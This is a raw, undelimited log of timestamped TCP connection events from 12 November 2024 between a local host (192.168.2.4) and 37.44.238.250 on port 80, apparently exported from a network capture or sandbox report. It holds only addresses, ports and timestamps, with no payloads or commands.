                                                                                                            Nov 12, 2024 00:42:20.566231012 CET804973837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:20.566621065 CET4973880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:21.060197115 CET4973980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:21.065026045 CET804973937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:21.065087080 CET4973980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:21.065226078 CET4973980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:21.069964886 CET804973937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:21.415997982 CET4973980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:21.421128035 CET804973937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:21.421142101 CET804973937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:21.421159983 CET804973937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:21.630490065 CET804973937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:21.674246073 CET4973980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:21.703578949 CET804973937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:21.806493044 CET4973980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:21.933311939 CET4973980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:21.934612989 CET4974180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:21.938911915 CET804973937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:21.938956022 CET4973980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:21.939377069 CET804974137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:21.939430952 CET4974180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:21.939548016 CET4974180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:21.944323063 CET804974137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:22.290970087 CET4974180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:22.370662928 CET804974137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:22.370918989 CET804974137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:22.371397972 CET804974137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:22.505284071 CET804974137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:22.603378057 CET4974180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:22.613277912 CET804974137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:22.689349890 CET4973580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:22.806515932 CET4974180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:24.393783092 CET4974180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:24.394144058 CET4974580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:24.400602102 CET804974137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:24.400630951 CET804974537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:24.400686026 CET4974180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:24.400728941 CET4974580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:24.400985003 CET4974580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:24.407274008 CET804974537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:24.760230064 CET4974580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:24.766766071 CET804974537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:24.768409014 CET804974537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:24.985726118 CET804974537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:25.058029890 CET804974537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:25.058096886 CET4974580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:29.027340889 CET4974580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:29.028399944 CET4974780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:29.032516956 CET804974537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:29.032562017 CET4974580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:29.033147097 CET804974737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:29.033204079 CET4974780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:29.033304930 CET4974780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:29.038014889 CET804974737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:29.385356903 CET4974780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:29.390399933 CET804974737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:29.390414000 CET804974737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:29.390430927 CET804974737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:29.600366116 CET804974737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:29.672290087 CET804974737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:29.672394991 CET4974780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:30.072711945 CET4974780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:30.073487997 CET4974880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:30.078263998 CET804974837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:30.078330040 CET4974880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:30.078450918 CET4974880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:30.083272934 CET804974837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:30.087039948 CET804974737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:30.087086916 CET4974780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:30.318667889 CET4974980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:30.323506117 CET804974937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:30.323574066 CET4974980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:30.323677063 CET4974980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:30.328453064 CET804974937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:30.431654930 CET4974880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:30.436516047 CET804974837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:30.436760902 CET804974837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:30.646241903 CET804974837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:30.650450945 CET4974880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:30.681833029 CET4974980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:30.686717987 CET804974937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:30.686729908 CET804974937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:30.686738968 CET804974937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:30.889199972 CET804974937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:30.969182968 CET804974937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:30.969238043 CET4974980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:31.778448105 CET4974980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:31.779062986 CET4975080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:31.785353899 CET804975037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:31.785412073 CET4975080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:31.785517931 CET4975080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:31.785562038 CET804974937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:31.785626888 CET4974980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:31.792032003 CET804975037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:31.911622047 CET4975080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:31.960382938 CET804975037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:32.203145027 CET804975037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:32.203206062 CET4975080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:32.394597054 CET4975280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:32.402271986 CET804975237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:32.402358055 CET4975280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:32.402479887 CET4975280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:32.409006119 CET804975237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:32.759845972 CET4975280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:32.766494989 CET804975237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:32.766549110 CET804975237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:32.766572952 CET804975237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:32.987780094 CET804975237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:33.056612968 CET4975280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:33.070226908 CET804975237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:33.244111061 CET4975280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:33.484638929 CET4975280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:33.490020990 CET804975237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:33.490075111 CET4975280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:33.656936884 CET4975380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:33.662295103 CET804975337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:33.662370920 CET4975380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:33.662520885 CET4975380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:33.667347908 CET804975337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:34.009813070 CET4975380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:34.014652014 CET804975337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:34.014676094 CET804975337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:34.014688015 CET804975337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:34.227639914 CET804975337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:34.306623936 CET4975380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:34.310503006 CET804975337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:34.494141102 CET4975380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:34.523298025 CET4975480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:34.528117895 CET804975437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:34.528213024 CET4975480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:34.528309107 CET4975480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:34.536092997 CET804975437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:34.884875059 CET4975480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:34.890003920 CET804975437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:34.890142918 CET804975437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:34.890151978 CET804975437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:35.096375942 CET804975437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:35.169240952 CET804975437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:35.169442892 CET4975480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:35.318273067 CET4975480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:35.325922012 CET804975437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:35.325977087 CET4975480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:35.362137079 CET4975680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:35.369451046 CET804975637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:35.369520903 CET4975680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:35.369682074 CET4975680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:35.376352072 CET804975637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:35.695749998 CET4975680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:35.702955008 CET4975780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:35.710262060 CET804975737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:35.710335016 CET4975780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:35.710448980 CET4975780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:35.717125893 CET804975737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:35.744431973 CET804975637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:35.788026094 CET804975637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:35.788084030 CET4975680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:35.865283012 CET4975880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:35.871879101 CET804975837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:35.871969938 CET4975880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:35.872054100 CET4975880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:35.879509926 CET804975837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:35.911186934 CET4975380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:36.056922913 CET4975780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:36.063935041 CET804975737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:36.066225052 CET804975737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:36.228596926 CET4975880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:36.235615969 CET804975837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:36.235627890 CET804975837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:36.235636950 CET804975837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:36.295454979 CET804975737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:36.353517056 CET4975780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:36.371891975 CET804975737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:36.454462051 CET4975780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:36.456948042 CET804975837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:36.539707899 CET804975837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:36.539810896 CET4975880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:36.723026037 CET4975780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:36.723120928 CET4975880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:36.729142904 CET4975980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:36.731812954 CET804975737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:36.731826067 CET804975837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:36.731869936 CET4975780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:36.731914997 CET4975880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:36.736044884 CET804975937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:36.738250017 CET4975980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:36.738367081 CET4975980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:36.745409012 CET804975937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:37.088108063 CET4975980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:37.092986107 CET804975937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:37.092998028 CET804975937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:37.093013048 CET804975937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:37.324107885 CET804975937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:37.399935961 CET804975937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:37.403287888 CET4975980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:37.633691072 CET4975980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:37.634068012 CET4976080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:37.640249968 CET804976037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:37.640316963 CET4976080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:37.640408993 CET4976080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:37.640549898 CET804975937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:37.640599012 CET4975980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:37.646955013 CET804976037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:37.994327068 CET4976080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:37.999164104 CET804976037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:37.999186039 CET804976037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:37.999197006 CET804976037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:38.225048065 CET804976037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:38.297266006 CET804976037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:38.297317028 CET4976080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:38.546799898 CET4976080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:38.548204899 CET4976180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:38.552001953 CET804976037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:38.552062988 CET4976080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:38.553056955 CET804976137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:38.553128004 CET4976180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:38.553230047 CET4976180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:38.557980061 CET804976137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:38.900804996 CET4976180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:38.905735970 CET804976137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:38.905744076 CET804976137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:38.905752897 CET804976137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:39.133013010 CET804976137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:39.211893082 CET804976137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:39.212021112 CET4976180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:39.418275118 CET4976180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:39.419384956 CET4976280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:39.424978971 CET804976137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:39.425730944 CET804976237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:39.426496029 CET4976180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:39.426619053 CET4976280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:39.426619053 CET4976280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:39.432950974 CET804976237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:39.776876926 CET4976280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:39.783176899 CET804976237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:39.783190966 CET804976237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:39.783202887 CET804976237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:40.012104034 CET804976237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:40.056691885 CET4976280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:40.087781906 CET804976237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:40.244190931 CET4976280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:40.583930969 CET4976280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:40.584655046 CET4976380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:40.590569019 CET804976237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:40.590615034 CET4976280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:40.590689898 CET804976337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:40.590749025 CET4976380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:40.590864897 CET4976380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:40.597367048 CET804976337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:40.947431087 CET4976380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:40.953886986 CET804976337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:40.953900099 CET804976337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:40.953908920 CET804976337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:41.175642014 CET804976337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:41.252226114 CET804976337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:41.255162954 CET4976380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:41.388845921 CET4976380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:41.389360905 CET4976480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:41.395646095 CET804976337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:41.395854950 CET804976437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:41.395909071 CET4976380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:41.395929098 CET4976480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:41.396047115 CET4976480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:41.402460098 CET804976437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:41.466521025 CET4976580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:41.466694117 CET4976480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:41.472981930 CET804976537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:41.473197937 CET4976580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:41.473341942 CET4976580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:41.479504108 CET804976537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:41.516536951 CET804976437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:41.804543018 CET804976437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:41.804788113 CET4976480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:41.822426081 CET4976580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:41.827248096 CET804976537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:41.827271938 CET804976537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:41.827280998 CET804976537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:42.041311026 CET804976537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:42.103569031 CET4976580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:42.121215105 CET804976537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:42.306708097 CET4976580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:42.314367056 CET4976580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:42.315527916 CET4976680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:42.319689989 CET804976537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:42.320321083 CET804976637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:42.320377111 CET4976580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:42.320405006 CET4976680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:42.320527077 CET4976680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:42.325258970 CET804976637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:42.666443110 CET4976680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:42.672916889 CET804976637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:42.672930956 CET804976637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:42.672940969 CET804976637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:42.885449886 CET804976637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:42.967684984 CET804976637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:42.971198082 CET4976680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:43.351015091 CET4976680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:43.351671934 CET4976780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:43.358076096 CET804976737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:43.358088970 CET804976637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:43.358150005 CET4976780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:43.358181000 CET4976680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:43.358318090 CET4976780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:43.364921093 CET804976737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:43.408946991 CET4976880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:43.409130096 CET4976780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:43.415371895 CET804976837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:43.415433884 CET4976880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:43.415626049 CET4976880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:43.422099113 CET804976837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:43.460660934 CET804976737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:43.760185957 CET4976880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:43.766684055 CET804976837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:43.767833948 CET804976837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:43.767844915 CET804976837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:43.768541098 CET804976737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:43.768596888 CET4976780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:43.983134985 CET804976837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:44.069796085 CET804976837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:44.069861889 CET4976880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:44.205487013 CET4976880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:44.206228018 CET4976980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:44.212513924 CET804976837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:44.212594986 CET4976880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:44.212651968 CET804976937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:44.212722063 CET4976980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:44.212867022 CET4976980192.168.2.437.44.238.250
